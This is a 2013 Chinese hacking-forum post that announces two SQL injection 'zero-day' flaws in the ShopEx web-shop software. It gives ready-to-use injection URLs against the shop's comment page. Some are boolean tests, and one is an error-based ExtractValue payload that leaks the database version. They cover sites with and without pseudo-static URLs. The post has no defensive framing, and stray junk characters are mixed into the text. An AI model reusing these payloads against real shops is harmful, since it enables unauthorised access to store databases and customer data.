找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1921|回复: 0
打印 上一主题 下一主题

shopex通杀注入0day漏洞两处

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-4 16:20:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…$ S9 H( P& V) B: x9 D

' v; n5 }$ z* a" o. p$ G, C好吧,我扯远了~~9 D0 g9 a# O2 d5 E
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~" f$ ]4 B+ e. _2 k: j& |$ U' p) q
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
6 ~+ x! N! w6 G$ X  b3 D* {. v) O6 r+ h1 J2 v' ?
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
8 S6 z% P4 Y* f. O8 _* r( M1 m2 k0 F6 j4 f7 O# ]5 H& z! h
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html* M0 `( `/ b5 P7 I# {% z$ y' Z/ I% R

/ ^* G  s- W) ^2 B2 }$ y3 khttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
8 T2 G8 e5 H+ w. c) I9 D
) o- {% o" L2 L' o+ Zhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html& |5 E9 `5 P( E) G; g( j0 t. {

1 I) k% b/ b- N" |0 X ) K& T6 X1 w' G" L. a5 ^1 n
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
! q4 O, {% e, U8 i) R5 r) h3 _如何注入就不多说了,10多年的东西了…不会也会了…. t+ N. Q' @; [0 ?) t! I7 }
1 }* A. m5 M& q# N! C" N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表